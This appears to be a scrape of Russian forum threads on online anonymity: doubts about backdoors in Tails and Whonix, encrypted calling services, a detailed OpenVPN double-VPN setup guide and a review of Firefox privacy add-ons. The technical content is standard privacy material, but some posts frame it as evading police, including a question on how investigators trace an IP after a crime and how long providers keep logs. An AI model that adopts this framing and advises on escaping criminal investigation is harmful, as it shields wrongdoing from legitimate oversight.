Есть кучи дистрибутивов антикриминалистических ОС, таких как Tails/Whonix/Kodachi и тому подобных.
Все эти ОС из мира опенсорс продуктов, что как бы гарантирует отсутствие в них различного рода программных закладок для деанонимзации пользователя. Но так ли безопасен опенсорс продукт?
Кто-нибудь компетентный реально проверял код этих ОС на наличие отстука куда нужно или всем хватило приставки опенсорс перед названием?
Где гарантии что конкретно эти ОС наибольшим образом не напичканы различного рода беэдорами? Ибо 90% пользователей данных ОС интересные личности со стороны органов, чего не скажешь о том же windows, выборка темных персонажей в котором будет заметно меньше.

Анонимно звоним любому абоненту

ID: 676533bbb4103b69df371c92
Thread ID: 42831
Created: 2020-10-04T01:37:49+0000
Last Post: 2020-10-06T05:53:06+0000
Author: WGS
Replies: 15 Views: 2K

Звоним анонимно любому абоненту

Использование SIM карты идентифицирует вас c ближайшей к вам сотовой вышкой.

Xочу рассказать вам о нескольких сервисах для звонков, у которых весь трафик проходит через сеть TOR или просто имеет очень высокую степень шифрования в сети.

Список сайтов:
https://tox.chat/
https://www.linphone.org/
https://jitsi.org/
https://www.ringcentral.com/
https://www.mumble.com/

Вычисление по айпи

ID: 676533bbb4103b69df371c97
Thread ID: 42137
Created: 2020-09-16T10:33:57+0000
Last Post: 2020-09-28T18:37:16+0000
Author: negg
Replies: 22 Views: 2K

Как вычисляют по айпи? Менты отправили запрос провайдеру. То что вот какого то юзера надо найти. Что дальше? Что делает провайдер? Какую имнно инфу и как? Допустим если есть дата преступления. И удаляет ли вообще провайдер инфу? Допустим после пол-года или года и тд?

Путь к анонимности...

ID: 676533bbb4103b69df371c9d
Thread ID: 37236
Created: 2020-05-11T16:56:14+0000
Last Post: 2020-09-16T00:24:42+0000
Author: amstrot
Replies: 10 Views: 2K

Просмотрел новый видос на канале "Чёрный Треугольник" и решил обсудить здесь кто что думает.

Двойной VPN на основе OpenVPN

ID: 676533bbb4103b69df371ca0
Thread ID: 40261
Created: 2020-07-31T17:30:12+0000
Last Post: 2020-09-12T13:04:24+0000
Author: lima8v4v
Prefix: Статья
Replies: 2 Views: 2K

Сначала настроим второй сервер:

Шаг 1. Установка OpenVPN

Bash:Copy to clipboard

sudo apt update sudo apt install openvpn easy-rsa

Шаг 2. Создание директории центра сертификации
OpenVPN это виртуальная частная сеть, использующая TLS/SSL. Это означает, что OpenVPN использует сертификаты для шифрования трафика между сервером и клиентами. Для выпуска доверенных сертификатов (trusted certificates) нам потребуется создать наш собственный центр сертификации.

Создайте пользователя с именем, например, openvpn-ca и перейдите в его домашний каталог:

Bash:Copy to clipboard

sudo adduser openvpn-ca sudo usermod -aG sudo openvpn-ca sudo su - openvpn-ca

Для начала скопируем шаблонную директорию easy-rsa в нашу домашнюю директорию с помощью команды make-cadir:

Bash:Copy to clipboard

make-cadir ~/openvpn-ca cd ~/openvpn-ca

Шаг 3. Настройка переменных центра сертификации
Для настройки переменных нашего центра сертификации нам необходимо отредактировать файл vars. Откройте этот файл в вашем текстовом редакторе:

Bash:Copy to clipboard

vi vars

Внутри файла вы найдёте переменные, которые можно отредактировать, и которые задают параметры сертификатов при их создании. Нам нужно изменить всего несколько переменных.

~/openvpn-ca/vars

export KEY_COUNTRY="US"
export KEY_PROVINCE="NY"
export KEY_CITY="New York City"
export KEY_ORG="CodeBy"
export KEY_EMAIL="admin@example.com"
export KEY_OU="Community"

Click to expand...

Пока мы в этом файле, отредактируем значение KEY_NAME чуть ниже, которое заполняет поле субъекта сертификатов. Для простоты зададим ему название vpnsrv2:

~/openvpn-ca/vars

export KEY_NAME="vpnsrv2"

Click to expand...

Сохраните и закройте файл.

Шаг 4. Создание центра сертификации
Теперь мы можем использовать заданные нами переменные и утилиты easy-rsa для создания центра сертификации.

Убедитесь, что вы находитесь в директории центра сертификации и используйте команду source к файлу vars. В моем случае также потребовалось добавить симлинк к файлу openssl-1.0.0.cnf:

Bash:Copy to clipboard

cd ~/openvpn-ca ln -s ~/openvpn-ca/openssl-1.0.0.cnf openssl.cnf source vars

Вы должны увидеть следующий вывод:

NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/sammy/openvpn-ca/keys

Убедимся, что мы работаем в "чистой среде" выполнив следующую команду:

Bash:Copy to clipboard

./clean-all

Теперь мы можем создать наш корневой центр сертификации командой:

Bash:Copy to clipboard

./build-ca

Эта команда запустит процесс создания ключа и сертификата корневого центра сертификации. Поскольку мы задали все переменные в файле vars, все необходимые значения будут введены автоматически. Нажимайте ENTER для подтверждения выбора.

Теперь у нас есть центр сертификации, который мы сможем использовать для создания всех остальных необходимых нам файлов.

Шаг 5. Создание сертификата, ключа и файлов шифрования для сервера
Далее создадим сертификат, пару ключей и некоторые дополнительные файлы, используемые для осуществления шифрования, для нашего сервера.

Начнём с создания сертификата OpenVPN и ключей для сервера. Это можно сделать следующей командой:

Внимание: Если ранее вы выбрали имя, отличное от server, вам придётся немного изменить некоторые инструкции. Например, при копировании созданных файлов в директорию /etc/openvpn вам придётся заменить имена на заданные вами. Вам также придётся изменить файл /etc/openvpn/server.conf для того, чтобы он указывал на корректные .crt и .key файлы.

Click to expand...

Bash:Copy to clipboard

./build-key-server vpnsrv2

Вывод опять будет содержать значения по умолчанию, переданные этой команде (server), а также значения из файла vars.

Согласитесь со всеми значениями по умолчанию, нажимая ENTER. Не задавайте challenge password. В конце процесса два раза введите y для подписи и подтверждения создания сертификата:

Code:Copy to clipboard

Вывод Certificate is to be certified until May 1 17:51:16 2026 GMT (3650 days) Sign the certificate? [y/n]:y 1 out of 1 certificate requests certified, commit? [y/n]y Write out database with 1 new entries Data Base Updated

Далее создадим оставшиеся файлы. Мы можем сгенерировать сильные ключи протокола Диффи-Хеллмана, используемые при обмене ключами, командой:

Bash:Copy to clipboard

./build-dh

Для завершения этой команды может потребоваться несколько минут.

Далее мы можем сгенерировать подпись HMAC для усиления способности сервера проверять целостность TSL :

Bash:Copy to clipboard

sudo openvpn --genkey --secret keys/ta.key sudo chown openvpn-ca:openvpn-ca keys/ta.key

Шаг 6. Создание сертификата и пары ключей для клиента

Далее мы можем сгенерировать сертификат и пару ключей для клиента. Вообще это можно сделать и на клиентской машине и затем подписать полученный ключ центром сертификации сервера, но в этой статье для простоты мы сгенерируем подписанный ключ на сервере.

В этой статье мы создадим ключ и сертификат только для одного клиента. Если у вас несколько клиентов, вы можете повторять этот процесс сколько угодно раз. Просто каждый раз передавайте уникальное значение скрипту.

Поскольку мы можем вернуться к этому шагу позже, мы повторим команду source для файла vars. Мы будем использовать параметр clientsrv2 для создания первого сертификата и ключа.

Для создания файлов без пароля для облегчения автоматических соединений используйте команду build-key:

Bash:Copy to clipboard

cd ~/openvpn-ca source vars ./build-key clientsrv2

В ходе процесса создания файлов все значения по умолчанию будут введены, вы можете нажимать ENTER. Не задавайте challenge password и введите y на запросы о подписи и подтверждении создания сертификата.

Шаг 7. Настройка сервиса OpenVPN
Далее настроим сервис OpenVPN с использованием созданных ранее файлов.

Копирование файлов в директорию OpenVPN Нам необходимо скопировать нужные нам файлы в директорию /etc/openvpn.

Сначала скопируем созданные нами файлы. Они находятся в директории ~/openvpn- ca/keys, в которой они и были созданы. Нам необходимо скопировать сертификат и ключ центра сертификации, сертификат и ключ сервера, подпись HMAC и файл Diffie-Hellman :

Bash:Copy to clipboard

cd ~/openvpn-ca/keys sudo mkdir /etc/openvpn/keys sudo cp ca.crt vpnsrv2.crt vpnsrv2.key dh2048.pem ta.key /etc/openvpn/keys/

Далее нам необходимо скопировать и распаковать файл-пример конфигурации OpenVPN в конфигурационную директорию, мы будем использовать этот файл в качестве базы для наших настроек:

Bash:Copy to clipboard

gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz | sudo tee /etc/openvpn/server.conf

Настройка конфигурации OpenVPN
Теперь, когда наши файлы находятся на своём месте, займёмся настройкой конфигурационного файла сервера:

Bash:Copy to clipboard

sudo vi /etc/openvpn/server.conf

Базовая настройка

Адрес сети VPN сервера

ethernet bridging. See the man page for more info.

server 10.8.1.0 255.255.255.0

Click to expand...

Найдём секцию HMAC поиском директивы tls-auth. Удалите " ;" для того, чтобы раскомментировать строку с tls-auth. Далее добавьте параметр key- direction и установите его значение в " 0":

tls-auth keys/ta.key 0 # This file is secret
key-direction 0

Click to expand...

Далее найдём секцию шифрования, нас интересуют закомментированные строки cipher. Удалите " ;" для раскомментирования строки AES-256-CBC:

cipher AES-256-CBC

Click to expand...

Под этой строкой добавьте строку auth и выберите алгоритм HMAC. Хорошим выбором будет SHA512:

auth SHA512

Click to expand...

Наконец, найдите настройки user и group и удалите " ;" для раскомментирования этих строк:

user nobody
group nogroup

Click to expand...

Необходимо закомментировать следующие директивы. Найдите секцию redirect- gateway и добавьте " ;" в начало строки:

;push "redirect-gateway def1 bypass-dhcp"

Click to expand...

Чуть ниже находится секция dhcp-option.

;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"

Click to expand...

(Опционально) Настройка порта и протокола
По умолчанию OpenVPN использует порт 1194 и протокол UDP для соединения с клиентами. Если вам необходимо изменить порт из-за каких-либо ограничений для ваших клиентов, вы можете сделать это изменив настройку port.

port 1194

TCP or UDP server?

proto tcp4

Click to expand...

(Опционально) Использование кастомного имени сертификата и ключа
Если во время использования команды ./build-key-server чуть выше вы указали параметр, отличный от vpnsrv2, измените настройки cert и key, чтобы они указывали на правильные файлы .crt и .key. Если вы использовали vpnsrv2, эти настройки должны выглядеть таким образом:

ca keys/ca.crt
cert keys/vpnsrv2.crt
key keys/vpnsrv2.key
dh keys/dh2048.pem

Click to expand...

Сохраните и закройте файл.

Шаг 8. Настройка сетевой конфигурации сервера
Далее нам необходимо настроить сетевую конфигурацию сервера, чтобы OpenVPN мог корректно перенаправлять трафик.

Настройка перенаправления IP
Сначала разрешим серверу перенаправлять трафик. Это ключевая функциональность нашего VPN сервера.

Настроим это в файле /etc/sysctl.conf:

Bash:Copy to clipboard

sudo vi /etc/sysctl.conf

Найдите строку настройки net.ipv4.ip_forward. Удалите " #" из начала строки, чтобы раскомментировать её:

net.ipv4.ip_forward=1

Click to expand...

Сохраните и закройте файл.

Для применения настроек к текущей сессии наберите команду:

Bash:Copy to clipboard

sudo sysctl -p

Настройка правил UFW для сокрытия соединений клиентов
Вам нужно установить файрвол UFW. Нам потребуется файрвол для манипулирования с входящим на сервер трафиком. Мы должны изменить файл настроек для сокрытия соединений (masquerading).

Bash:Copy to clipboard

sudo apt update sudo apt install ufw

Откроем файл /etc/ufw/before.rules и добавим туда соответствующие настройки:

Bash:Copy to clipboard

sudo vi /etc/ufw/before.rules

Это файл содержит настройки UFW , которое применяются перед применением правил UFW. Добавьте в начало файла выделенные красным строки. Это настроит правила, применяемые по умолчанию, к цепочке POSTROUTING в таблице nat и будет скрывать весь трафик от VPN :

rules.before

Rules that should be run before the ufw command line added rules. Custom

rules should be added to one of these chains:

ufw-before-input

ufw-before-output

ufw-before-forward

START OPENVPN RULES

NAT table rules

*nat
:POSTROUTING ACCEPT [0:0]

Allow traffic from OpenVPN client to eth0

-A POSTROUTING -s 10.8.1.0/24 -o eth0 -j MASQUERADE
COMMIT

END OPENVPN RULES

Don't delete these required lines, otherwise there will be errors

Click to expand...

Сохраните и закройте файл.

Теперь мы должны сообщить UFW , что ему по умолчанию необходимо разрешать перенаправленные пакеты. Для этого откройте файл /etc/default/ufw:

Bash:Copy to clipboard

sudo vi /etc/default/ufw

Найдите в файле директиву DEFAULT_FORWARD_POLICY. Мы изменим значение с DROP на ACCEPT:

DEFAULT_FORWARD_POLICY="ACCEPT"

Click to expand...

Сохраните и закройте файл.

Открытие порта OpenVPN и применение изменений
Далее настроим сам файрвол для разрешения трафика в OpenVPN.

Если вы не меняли порт и протокол в файле /etc/openvpn/server.conf, вам необходимо разрешить трафик UDP для порта 1194. Если вы изменили эти настройки, введите указанные вами значения. В моем случае это TCP порт **1194

Также добавьте ваш SSH порт**

Bash:Copy to clipboard

sudo ufw allow 22 sudo ufw allow 1194/tcp

Теперь деактивируем и активируем UFW для применения внесённых изменений:

Bash:Copy to clipboard

sudo ufw disable sudo ufw enable

Теперь наш сервер сконфигурирован для обработки трафика OpenVPN.

Шаг 9. Включение сервиса OpenVPN
Мы готовы включит сервис OpenVPN на нашем сервере. Мы можем сделать это с помощью systemd.

Нам необходимо запустить сервер OpenVPN указав имя нашего файла конфигурации в качестве переменной после имени файла systemd. Файл конфигурации для нашего сервера называется /etc/openvpn/server.conf, поэтому мы добавим @server в конец имени файла при его вызове:

Bash:Copy to clipboard

sudo systemctl start openvpn@server

Убедимся, что сервис успешно запущен командой:

Bash:Copy to clipboard

sudo systemctl status openvpn@server

Если всё в порядке, настроем сервис на автоматическое включение при загрузке сервера:

Bash:Copy to clipboard

sudo systemctl enable openvpn@server

Шаг 10. Создание инфраструктуры настройки клиентов
Далее настроим систему для простого создания файлов конфигурации для клиентов.

Создание структуры директорий конфигурации клиентов
В домашней директории создайте структуру директорий для хранения файлов:

Bash:Copy to clipboard

sudo su - openvpn-ca mkdir -p ~/client-configs/files

Поскольку наши файлы конфигурации будут содержать клиентские ключи, мы должны настроить права доступа для созданных директорий:

Bash:Copy to clipboard

chmod 700 ~/client-configs/files

Создание базовой конфигурации
Далее скопируем конфигурацию-пример в нашу директорию для использования в качестве нашей базовой конфигурации:

Bash:Copy to clipboard

cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/client-configs/base.conf

Откройте этот файл в вашем текстовом редакторе:

Bash:Copy to clipboard

vi ~/client-configs/base.conf

Сделаем несколько изменений в этом файле.

Сначала найдите директиву remote. Эта директива сообщает клиенту адрес нашего сервера OpenVPN. Это должен быть публичный IP адрес вашего сервера OpenVPN. Если вы изменили порт, который слушает сервер OpenVPN , измените порт по умолчанию 1194 на ваше значение:

The hostname/IP and port of the server.

You can have multiple remote entries

to load balance between the servers.

remote server_IP_address 1194

Click to expand...

Убедитесь, что протокол совпадает с настройками сервера:

proto tcp

Click to expand...

Далее раскомментируйте директивы user и group удаляя " ;":

Downgrade privileges after initialization (non-Windows only)

user nobody
group nogroup

Click to expand...

Найдите директивы ca, cert и key. Закомментируйте эти директивы, так как мы будем добавлять сертификаты и ключи в самом файле:

SSL/TLS parms.

See the server config file for more

description. It's best to use

a separate .crt/.key file pair

for each client. A single ca

file can be used for all clients.

#ca ca.crt
#cert client.crt
#key client.key

Click to expand...

Добавьте настройки cipher и auth согласно заданным в файле /etc/openvpn/server.conf:

cipher AES-256-CBC
auth SHA512

Click to expand...

Далее добавьте директиву key-direction в любое место в файле. Она должна иметь значение " 1" для корректной работы сервера:

key-direction 1

Click to expand...

Создание скрипта генерации файлов конфигурации
Теперь создадим простой скрипт для генерации файлов конфигурации с релевантными сертификатами, ключами и файлами шифрования. Он будет помещать сгенерированные файла конфигурации в директорию ~/client-configs/files.

Создайте и откройте файл make_config.sh внутри директории ~/client-configs:

Bash:Copy to clipboard

vi ~/client-configs/make_config.sh

Вставьте следующие текст в этот файл:

#!/bin/bash

First argument: Client identifier

KEY_DIR=~/openvpn-ca/keys
OUTPUT_DIR=~/client-configs/files
BASE_CONFIG=~/client-configs/base.conf

cat ${BASE_CONFIG} \
<(echo -e '') \
${KEY_DIR}/ca.crt \
<(echo -e '\n') \
${KEY_DIR}/${1}.crt \
<(echo -e '\n') \
${KEY_DIR}/${1}.key \
<(echo -e '\n') \
${KEY_DIR}/ta.key \
<(echo -e '') \

${OUTPUT_DIR}/${1}.ovpn

Click to expand...

Сохраните и закройте файл.

Сделайте его исполняемым файлом командой:

Bash:Copy to clipboard

chmod 700 ~/client-configs/make_config.sh

Шаг 11. Генерация конфигураций клиентов
Теперь мы можем легко сгенерировать файлы конфигурации клиентов.

Если вы следовали всем шагам этой статьи, вы создали сертификат clientsrv2.crt и ключ клиента clientsrv2.key командой ./build-key clientsrv2 на шаге 6. Вы можете сгенерировать конфигурацию для этих файлов перейдя в директорию ~/client-configs и используя только что созданный нами скрипт:

Bash:Copy to clipboard

cd ~/client-configs ./make_config.sh clientsrv2

Если всё прошло успешно, мы должны получить файл clientsrv2.ovpn в директории ~/client-configs/files:

Bash:Copy to clipboard

ls ~/client-configs/files

Вывод

clientsrv2.ovpn

Click to expand...

Доставка конфигураций на первый сервер
Теперь мы должны переместить файл конфигурации первый сервер SRV1.

На первом сервере делаем все идентично, кроме следующих пунктов:

Bash:Copy to clipboard

sudo vi /etc/ufw/before.rules

Интерфейс eth0 меняем на tun1 и адрес 10.8.1.0/24 на 10.8.0.0/24

rules.before

Rules that should be run before the ufw command line added rules. Custom

rules should be added to one of these chains:

ufw-before-input

ufw-before-output

ufw-before-forward

START OPENVPN RULES

NAT table rules

*nat
:POSTROUTING ACCEPT [0:0]

Allow traffic from OpenVPN client to tun1

-A POSTROUTING -s 10.8.0.0/24 -o tun1 -j MASQUERADE
COMMIT

END OPENVPN RULES

Don't delete these required lines, otherwise there will be errors

Click to expand...

Сохраните и закройте файл.

Перенаправление всего трафика через VPN сервер

Адрес сети VPN сервера

Bash:Copy to clipboard

sudo vi /etc/openvpn/server.conf

ethernet bridging. See the man page for more info.

server 10.8.0.0 255.255.255.0

Click to expand...

Протокол ставим udp4

TCP or UDP server?

proto udp4

Click to expand...

Далее раскомментируйте следующие строки. Секция redirect-gateway:

push "redirect-gateway def1 bypass-dhcp"
и секция dhcp-option

Click to expand...

push "dhcp-option DNS 208.67.222.222"
push "dhcp-option DNS 208.67.220.220"

Click to expand...

также эту директиву

explicit-exit-notify 1

Click to expand...

Прописываем правила маршрутизации на первом сервере:

Создадим скрипт /etc/openvpn/upstream-route.sh содержащий следующие команды:

#!/bin/sh

ip rule add from 10.8.0.0/24 table 120
ip route add default dev tun1 table 120

exit 0
chmod +x /etc/openvpn/upstream-route.sh

Click to expand...

Далее добавим их в файл конфигурации клиента который подключается ко второму серверу.

Bash:Copy to clipboard

vi clientsrv2.ovpn

script-security 2
up upstream-route.sh

Click to expand...

Также в этом файле необходимо указать чтобы OpenVPN клиент всегда занимал интерфейс tun1:

dev tun1

Click to expand...

Скопируем clientsrv2.ovpn в корневую папку OpenVPN и переиминуем его в client.conf

Bash:Copy to clipboard

sudo cp clientsrv2.ovpn /etc/openvpn/client.conf

Настраиваем автозауск

Bash:Copy to clipboard

# server sudo systemctl start openvpn@server sudo systemctl enable openvpn@server # client to srv2 sudo systemctl start openvpn@client sudo systemctl start openvpn@client

Точно так же создаем инфраструктуру настройки клиентов.
Шаг 10
И сгенерированный файл переносим на клиентскую машину.

Подключение на Linux

Bash:Copy to clipboard

sudo apt update sudo apt install openvpn sudo openvpn --config clientsrv1.ovpn

В результате вы подключитесь к серверу.

Источник: https://gist.github.com/gushmazuko/a74debe24bcabb0bbedf5695cb703a12

Собираем набор полезных плагинов для Firefox

ID: 676533bbb4103b69df371ca8
Thread ID: 41159
Created: 2020-08-21T10:44:23+0000
Last Post: 2020-08-28T02:00:16+0000
Author: pablo
Prefix: Статья
Replies: 10 Views: 2K

В этой статье мы рассмотрим самые интересные из плагинов, которые позволяют превратить Firefox в мощный безопасный браузер, который будет блокировать слежку за пользователем.

Privacy Possum

privacy-possum

Это, наверное, один из самых известных плагинов для Firefox, предназначенных для борьбы со слежкой методом блокировки и фальсификации данных, которые собирают различные трекинговые скрипты. Privacy Possum предотвращает прием файлов cookies, блокирует HTTP-заголовки set-cookie и referrer, а также искажает «отпечаток» браузера, что затрудняет фингерпринтинг.

Сайты могут отслеживать пользователя не только с помощью куков, но и благодаря так называемому отпечатку браузера (browser fingerprint). Причем, помимо данных самого браузера (таких как User Agent), «отпечаток» включает сведения о версии и разрядности ОС, экранном разрешении и другие передаваемые наружу параметры аппаратной и программной конфигурации машины. Подобный «отпечаток», конечно, не уникален, но с определенной долей достоверности позволяет идентифицировать пользователя.

Продвинутых настроек у плагина нет: его можно включить или выключить, а на страничке конфигурации — запретить автоматическое обновление и разрешить ему запускаться в приватном окне.

![Плагин Privacy Possum не имеет продвинутых настроек](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14540%2Faddon-01.png&hash=4d2fb188f19eb5aeeda0b61b240fab23)
Плагин Privacy Possum не имеет продвинутых настроек

После установки Privacy Possum мне стало крайне любопытно, что скажет о его работе тест Panopticlick, который мы использовали в прошлый раз для проверки защищенных браузеров. Тест показал, что плагин и вправду блокирует cookies и рекламные трекеры, а с помощью сайта Webkay удалось выяснить, что при включенном расширении браузер оставляет о себе значительно меньше информации, чем без него, — фактически, кроме IP-адреса, наружу утекла только разрядность процессора, версия ОС и самого Firefox. Результат, прямо скажем, вполне на уровне какого-нибудь Comodo Dragon.

Trace

absolutedouble-trace

Еще один плагин, который «ломает» механизм фингерпринтинга, подменяя отправляемые на удаленные серверы данные, в том числе изменяя HTTP-заголовки. Лилово-алый с оранжевым оттенком фон страницы настроек как бы намекает нам на то, что авторы аддона шутить не любят — тут все серьезно!

[![Так выглядят настройки Trace](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14547%2Ftrace.png&hash=b5404aa8ab5c1640a77f802a7e8b2fd8)](https://st768.s3.eu- central-1.amazonaws.com/43b98bf97cea6298dbe5937a79bf747f/14547/trace.png)
Так выглядят настройки Trace

Trace работает со списками доменов, разделенных на категории, однако в бесплатной версии плагина доступен только базовый список, набор поддоменов Facebook и перечень сайтов, майнящих криптовалюты с использованием JavaScript. Все остальные категории — вроде видеотрекеров, сайтов, любящих отправлять push-уведомления и ресурсов, рассылающих спам, — доступны только премиум- подписчикам.

TrackMeNot

trackmenot

Этот плагин предназначен для борьбы с трекингом поисковых запросов. Каждый пользователь знает на собственном горьком опыте: достаточно один раз поискать в интернете совковую лопату, и следующую неделю ты будешь любоваться рекламой граблей, мотыг и даже мотокультиваторов. Вот этому явлению и противостоит TrackMeNot, отправляя поисковикам рандомизированные запросы, которые заставляют их электронные мозги кипеть и плавиться. Настроек у этого плагина побольше, но все они, в общем-то, просты и понятны.

[![Настройки плагина TrackMeNot](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14541%2Faddon-02.png&hash=383471f44796342d80ab933ee77f5231)](https://st768.s3.eu- central-1.amazonaws.com/43b98bf97cea6298dbe5937a79bf747f/14541/addon-02.png)
Настройки плагина TrackMeNot

Здесь можно, например, включить или отключить burst mode — отправку запросов конкретно в тот поисковик, в котором юзер что-то ищет в данный момент, выбрать из списка используемые поисковые системы или добавить туда свою. Среди других настроек — периодичность отправки запросов и ведение журнала, которое при желании можно отключить. Плагин переведен на шесть языков, однако русского среди них нет.

Decentraleyes

decentraleyes

Этот аддон защищает от отслеживания через CDN, отправляя множество запросов к публичным CDN-службам вроде YandexCDN, GHL, MaxCDN. Как и любое полезное изобретение, CDN приносит пользу не только простым пользователям, но и коммерсантам, желающим знать об этих самых пользователях как можно больше, а лучше — все.

CDN (Content Delivery Network), или сеть доставки (и дистрибуции) содержимого, — это распределенная аппаратно-программная инфраструктура, ускоряющая доставку контента конечным пользователям. Физически это реализовано так: идентичный контент размещают на нескольких географически рассредоточенных серверах, чтобы сократить время ожидания и загрузки данных при обращении к такому серверу. Эта же система, как правило, использует сценарии сбора статистики и контроля посещаемости, которая может служить для отслеживания пользователей.
[![В настройках Decentraleyes можно создать белый список доверенных доменов](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14542%2Faddon-03.png&hash=a375442fbbb37a169dc2995ee679b20c)](https://st768.s3.eu- central-1.amazonaws.com/43b98bf97cea6298dbe5937a79bf747f/14542/addon-03.png)
В настройках Decentraleyes можно создать белый список доверенных доменов

Блокировка и подмена запросов CDN может поломать некоторые сайты, поэтому плагин подставляет вместо загружаемых из сети локальные файлы там, где это необходимо. Настройками расширение тоже небогато, но зато на странице конфигурации можно добавить домены в белый список — и к ним не будет применяться CDN-фильтрация.

Change Geolocation

change-geolocation-locguard

Название этого аддона говорит само за себя: он позволяет грозить Южному централу, сидя где-нибудь в Мытищах, то есть менять геолокацию в Firefox.

[![Настройки плагина Change Geolocation](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14543%2Faddon-04.png&hash=dee9cd7ea20a66e464cdae801ad13b2a)](https://st768.s3.eu- central-1.amazonaws.com/43b98bf97cea6298dbe5937a79bf747f/14543/addon-04.png)
Настройки плагина Change Geolocation

По умолчанию плагин предлагает использовать в качестве текущей геопозиции исторический район Гринвич в Лондоне, но при желании ты можешь задать в настройках любые координаты, переехав куда-нибудь в Сохо. Для этого нужно ввести желаемую широту и долготу и при необходимости указать иные параметры API геолокации. Очевидно, что плагин не поможет в борьбе против алгоритмов, которые определяют местоположение пользователя по IP-адресу, но все остальные сайты он способен обмануть.

HTTPS everywhere

https-everywhere

Довольно простой, но крайне полезный плагин, заставляющий браузер принудительно включать HTTPS при соединении с сайтами, которые его поддерживают, даже если ты набрал в адресной строке префикс http. После установки расширения в инструментальной панели Firefox появляется значок, по щелчку на котором можно дезактивировать плагин, включить или отключить принудительное блокирование незашифрованных HTTP-запросов, а также нажатием одной кнопки добавить открытый в браузере сайт в список исключений. Довольно полезный инструмент для всех, кто заботится о собственной безопасности.

FoxyProxy

foxyproxy-standard

Широко известный, очень популярный и крайне востребованный плагин, позволяющий добавить в Firefox функцию, подобную разрекламированному VPN в Opera. Просто указываешь в настройках аддона адрес и порт любого бесплатного прокси-сервера, после чего его можно включать или отключать одним щелчком мыши — и все заблокированные интернет-ресурсы снова становятся доступны словно по волшебству.

[![Настройки плагина FoxyProxy](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14544%2Faddon-05.png&hash=16d0b57a71f11125dd47856aebd51782)](https://st768.s3.eu- central-1.amazonaws.com/43b98bf97cea6298dbe5937a79bf747f/14544/addon-05.png)
Настройки плагина FoxyProxy

FoxyProxy поддерживает сразу несколько прокси-серверов, поэтому ты можешь быстро переключаться между ними, если какой-то сервис из списка внезапно отвалится. Для пущего удобства аддон позволяет импортировать ранее созданные настройки или заранее подготовленный список прокси, а также экспортировать его для переноса на другой компьютер. Поддерживается множество типов серверов: HTTP, HTTPS, SOCKS 5 и 4, WPAD и PAC URL — есть из чего выбрать. В общем, этот плагин — маст-хэв для каждого пользователя Firefox. Если ты его еще не установил, торопись исправить это упущение.

NoScript

noscript

Известно, что именно скрипты чаще всего оказываются основной причиной утечки конфиденциальных данных в браузере и нарушения приватности. В Tor Browser режим NoScript доступен из коробки, в Firefox его можно включить, установив одноименный плагин.

[![Настройки плагина NoScript](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14545%2Faddon-06.png&hash=172e8e3d4f18bbaa0940e175f9ba9433)](https://st768.s3.eu- central-1.amazonaws.com/43b98bf97cea6298dbe5937a79bf747f/14545/addon-06.png)
Настройки плагина NoScript

Расширение делит все сайты на три категории — «по умолчанию», «доверенные» и «недоверенные». Для первой категории разрешено выполнение только некоторых, наиболее «безопасных» типов скриптов, доверенным дозволено все, а на недоверенных сайтах скрипты, соответственно, под тотальным запретом. Отредактировать списки и перенести сайт из одной категории в другую можно на вкладке Per-Site Permissions в окне настроек плагина. Поскольку режим NoScript довольно часто ломает структуру веб-страниц, нажатием одной кнопки в панели инструментов Firefox можно временно отключить аддон для текущего сайта либо сразу добавить его в доверенные. Как и в предыдущем случае, NoScript поддерживает импорт и экспорт настроек, что позволяет быстро переносить их из одной системы в другую.

uBlock Origin и uMatrix

ublock-origin

umatrix

Два плагина от одного разработчика, первый из которых предназначен для блокировки рекламы, а второй — для перехвата и блокировки запросов браузера. Расширение uBlock Origin имеет огромное количество настроек, разобраться с которыми с ходу не так-то просто.

[![Настройки плагина uBlock Origin](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F43b98bf97cea6298dbe5937a79bf747f%2F14546%2Faddon-07.png&hash=7ffefd5fb3a47cbcac34f67ac77da669)](https://st768.s3.eu- central-1.amazonaws.com/43b98bf97cea6298dbe5937a79bf747f/14546/addon-07.png)
Настройки плагина uBlock Origin

Здесь можно задать типы блокируемого контента и изменить отображение статистики, отредактировать списки фильтров, создать собственные фильтры и правила фильтрации. В настройках можно завести белый список доменов, к которым не будет применяться фильтрация контента, а также импортировать правила и настройки с другого компьютера.

Плагин uMatrix настраивается аналогичным образом — пользователю доступны для редактирования правила фильтрации запросов, черный список доменов, обращения к которым будут блокироваться, а также ряд настроек приватности. Среди них — автоматическое удаление заблокированных и сессионных файлов cookies, очистка содержимого локального хранилища браузера через заданные промежутки времени, блокировка всех попыток аудита гиперссылок, запрет на загрузку с веб-страниц смешанного контента одновременно через HTTP и HTTPS, а также некоторые другие.

Безусловно, чтобы разобраться в параметрах работы этих аддонов, придется потратить некоторое время. Но оно того стоит: если все настроить правильно, другие блокировщики рекламы и контентные фильтры тебе не понадобятся.

Google search link fix

google-search-link-fix

Это простой плагин, блокирующий сбор статистики о нажатиях на ссылки в поисковой выдаче Google. Установи его, если не желаешь передавать в «Корпорацию добра» сведения о заинтересовавших тебя результатах поиска. Или пользуйся Яндексом.

Facebook Container

facebook-container

